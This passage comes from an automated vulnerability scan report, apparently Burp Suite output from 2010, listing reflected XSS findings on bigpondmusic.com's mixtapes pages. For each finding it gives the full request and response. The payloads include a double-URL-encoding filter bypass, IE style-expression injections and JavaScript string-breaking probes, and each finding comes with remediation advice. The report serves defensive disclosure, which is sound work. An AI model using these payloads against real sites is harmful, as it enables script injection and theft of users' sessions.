The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 313ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316fc507611 was submitted in the REST URL parameter 1. This input was echoed as 313ea"><script>alert(1)</script>316fc507611 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes313ea%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e316fc507611/celebrity HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:14:53 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88349
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 56e88'%3bff2886175b1 was submitted in the REST URL parameter 2. This input was echoed as 56e88';ff2886175b1 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/celebrity56e88'%3bff2886175b1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:14 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87824
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3afb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d9da0d1c8e was submitted in the REST URL parameter 2. This input was echoed as 3afb5"><script>alert(1)</script>3d9da0d1c8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes/celebrity3afb5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3d9da0d1c8e HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88565
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.310. http://bigpondmusic.com/mixtapes/celebrity [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/mixtapes/celebrity
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e414f"style%3d"x%3aexpression(alert(1))"e32a6bfbe6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e414f"style="x:expression(alert(1))"e32a6bfbe6a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /mixtapes/celebrity?e414f"style%3d"x%3aexpression(alert(1))"e32a6bfbe6a=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:47 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 101227
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1c5c6'%3b8948a3e7d4a was submitted in the REST URL parameter 1. This input was echoed as 1c5c6';8948a3e7d4a in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes1c5c6'%3b8948a3e7d4a/create HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:10 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88034
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcd5c1c9973 was submitted in the REST URL parameter 1. This input was echoed as 39a87"><script>alert(1)</script>dcd5c1c9973 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes39a87%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253edcd5c1c9973/create HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87920
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 55f85'%3bf080df37b37 was submitted in the REST URL parameter 2. This input was echoed as 55f85';f080df37b37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/create55f85'%3bf080df37b37 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:30 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88445
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93a25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e487d00b0080 was submitted in the REST URL parameter 2. This input was echoed as 93a25"><script>alert(1)</script>487d00b0080 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes/create93a25%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e487d00b0080 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:27 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88556
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.315. http://bigpondmusic.com/mixtapes/create [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/mixtapes/create
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4a106"style%3d"x%3aexpression(alert(1))"d3372b08d8b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4a106"style="x:expression(alert(1))"d3372b08d8b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /mixtapes/create?4a106"style%3d"x%3aexpression(alert(1))"d3372b08d8b=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:39 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 66651
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Login - BigPond Music MP3 Do ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/create?4a106"style="x:expression(alert(1))"d3372b08d8b=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 405c6'%3b5b8badcedb6 was submitted in the REST URL parameter 1. This input was echoed as 405c6';5b8badcedb6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes405c6'%3b5b8badcedb6/favourites HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:17 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87880
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3671a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e488f4810798 was submitted in the REST URL parameter 1. This input was echoed as 3671a"><script>alert(1)</script>488f4810798 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes3671a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e488f4810798/favourites HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:15 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88352
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45522'%3bc65a754ba24 was submitted in the REST URL parameter 2. This input was echoed as 45522';c65a754ba24 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mixtapes/favourites45522'%3bc65a754ba24 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:41 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 87767
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 90474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e963876f3728 was submitted in the REST URL parameter 2. This input was echoed as 90474"><script>alert(1)</script>963876f3728 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /mixtapes/favourites90474%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e963876f3728 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 404 Not Found Connection: close Date: Tue, 23 Nov 2010 03:15:36 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 88016
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
2.320. http://bigpondmusic.com/mixtapes/favourites [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://bigpondmusic.com
Path:
/mixtapes/favourites
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d0f8"style%3d"x%3aexpression(alert(1))"dafd2609343 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d0f8"style="x:expression(alert(1))"dafd2609343 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /mixtapes/favourites?3d0f8"style%3d"x%3aexpression(alert(1))"dafd2609343=1 HTTP/1.1 Host: bigpondmusic.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: gpv_p49=Music; s_cc=true; __utmz=183468341.1290483706.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/3; s_sq=%5B%5BB%5D%5D; s_nr=1290483709730; gpv_e48=BP%3AMusic%3Adefault; __utma=183468341.1898852443.1290483706.1290483706.1290483706.1; gpv_p43=BP%3AMusic%3Adefault; __utmc=183468341; __utmb=183468341.1.10.1290483706; s_sv_sid=436779766338; gpv_e44=Music;
Response
HTTP/1.1 200 OK Connection: close Date: Tue, 23 Nov 2010 03:14:48 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 X-Handler: BigpondMusic Pragma: no-cache X-AspNetMvc-Version: 1.0 p3p: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Cache-Control: no-cache Pragma: no-cache Expires: -1 Content-Type: text/html; charset=utf-8 Content-Length: 66663
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<title>Login - BigPond Music MP3 Do ...[SNIP]... <input type="hidden" name="parentUrl" value="http://bigpondmusic.com/mixtapes/favourites?3d0f8"style="x:expression(alert(1))"dafd2609343=1" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 14be3'%3be9b05043c37 was submitted in the REST URL parameter 1. This input was echoed as 14be3';e9b05043c37 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
